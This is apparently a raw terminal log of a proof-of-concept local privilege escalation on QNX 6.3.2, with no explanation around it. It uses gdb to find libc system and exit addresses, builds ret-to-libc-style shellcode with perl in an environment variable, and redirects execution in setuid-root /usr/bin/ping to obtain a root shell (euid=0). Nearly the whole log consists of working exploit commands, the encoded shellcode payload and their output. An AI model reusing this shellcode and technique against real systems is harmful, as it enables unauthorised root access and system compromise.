bash-2.05a$ uname -a
QNX muh 6.3.2 2006/03/16-14:19:50EST x86pc x86
bash-2.05a$ gdb -q /usr/bin/ping # we use some ret-to-libc-type-shellcode
(gdb) p system
$1 = {<text variable, no debug info>} 0xb031897c <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb0321ff8 <exit>
(gdb) q
bash-2.05a$ export SHELLCODE=`perl -e 'print "\xeb\x11\xb9\x7c\x89\x31\xb0\xff\xd1\x31\xc9\x51\xb9\xf8\x1f\x32\xb0\xff\xd1\xe8\xea\xff\xff\xffid;sh"'`
bash-2.05a$ ls -l /usr/bin/ping
-rwsrwxr-x 1 root root 36172 Dec 09 2004 /usr/bin/ping
bash-2.05a$ gdb -q /usr/bin/ping
(gdb) break main
Breakpoint 1 at 0x8049321
(gdb) r
Starting program: /usr/bin/ping
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
(gdb) cont
Continuing.
(no debugging symbols found)…(no debugging symbols found)…[Switching to process 4157479]

Breakpoint 1, 0x08049321 in main ()
(gdb) x/1000sw $sp
[snip]
0x8047e1c: "SHELLCODE=л\021№|\2111°яС1ЙQ№ш\0372°яСикяяяid;sh"
[snip]
(gdb) x/sw 0x8047e1c+10
0x8047e26: "л\021№|\2111°яС1ЙQ№ш\0372°яСикяяяid;sh"
(gdb) set $eip=0x8047e26
(gdb) cont
Continuing.
uid=100(kokanin) gid=100(users) euid=0(root)

lol lol

sh: lol: not found